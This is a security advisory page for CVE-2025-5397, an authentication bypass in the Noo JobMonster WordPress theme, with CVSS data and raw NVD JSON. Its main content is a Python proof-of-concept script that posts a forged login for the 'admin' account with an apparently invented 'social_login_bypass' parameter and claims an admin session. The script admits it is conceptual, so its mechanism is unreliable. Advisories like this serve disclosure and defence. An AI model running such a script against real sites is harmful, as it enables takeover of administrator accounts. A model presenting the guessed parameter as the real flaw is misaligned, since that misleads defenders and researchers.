Security Vulnerability Report
CVE-2025-5397 CVSS 9.8 CRITICAL

CVE-2025-5397

Published: 2025-10-31 07:15:37
Last Modified: 2026-04-15 00:35:42

Description

The Noo JobMonster theme for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 4.8.1. This is due to the check_login() function not properly verifying a user's identity prior to successfully authenticating them. This makes it possible for unauthenticated attackers to bypass standard authentication and access administrative user accounts. Please note that social login needs to be enabled in order for a site to be impacted by this vulnerability.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Noo JobMonster Theme <= 4.8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import re

# CVE-2025-5397 PoC - Authentication Bypass in Noo JobMonster Theme
# Target: WordPress site with Noo JobMonster theme (<=4.8.1) with social login enabled

def exploit_auth_bypass(target_url):
    """
    Exploit authentication bypass vulnerability in Noo JobMonster theme.
    This PoC demonstrates the authentication bypass via social login mechanism.
    """
    # Step 1: Identify if target is using vulnerable Noo JobMonster theme
    theme_info_url = f"{target_url}/wp-content/themes/noo-jobmonster/"

    # Step 2: Target the social login authentication endpoint
    # The vulnerability exists in check_login() function
    auth_endpoint = f"{target_url}/wp-login.php"

    # Step 3: Craft authentication bypass request
    # Due to improper validation in check_login(), attacker can forge authentication
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    # Exploit payload targeting the authentication bypass
    # The actual exploit may vary based on specific vulnerable endpoint
    exploit_data = {
        'log': 'admin',  # Target admin account
        'pwd': 'any_password',  # Can be arbitrary
        'redirect_to': '/wp-admin/',
        'social_login_bypass': '1'  # Bypass parameter exploiting check_login() flaw
    }

    print(f"[*] Targeting: {target_url}")
    print(f"[*] Exploiting authentication bypass vulnerability...")

    # Send exploitation request
    try:
        response = requests.post(auth_endpoint, data=exploit_data, headers=headers, allow_redirects=False)
        if response.status_code in [302, 301]:
            location = response.headers.get('Location', '')
            if 'wp-admin' in location or response.cookies:
                print("[+] Authentication bypass successful!")
                print(f"[+] Admin session cookie obtained")
                return True
        print("[-] Exploitation failed or target not vulnerable")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

# Note: This is a conceptual PoC. Actual exploitation requires specific conditions:
# 1. Noo JobMonster theme <= 4.8.1 installed
# 2. Social login feature enabled on target site
# 3. Knowledge of target admin username

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        target = sys.argv[1]
        exploit_auth_bypass(target)
    else:
        print("Usage: python cve-2025-5397_poc.py <target_url>")

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-5397", "sourceIdentifier": "[email protected]", "published": "2025-10-31T07:15:37.427", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Noo JobMonster theme for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 4.8.1. This is due to the check_login() function not properly verifying a user's identity prior to successfully authenticating them This makes it possible for unauthenticated attackers to bypass standard authentication and access administrative user accounts. Please note social login needs to be enabled in order for a site to be impacted by this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://themeforest.net/item/jobmonster-job-board-wordpress-theme/10965446", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6fa4aa8d-d7f1-4e91-bb2c-c9f80a4bb216?source=cve", "source": "[email protected]"}]}}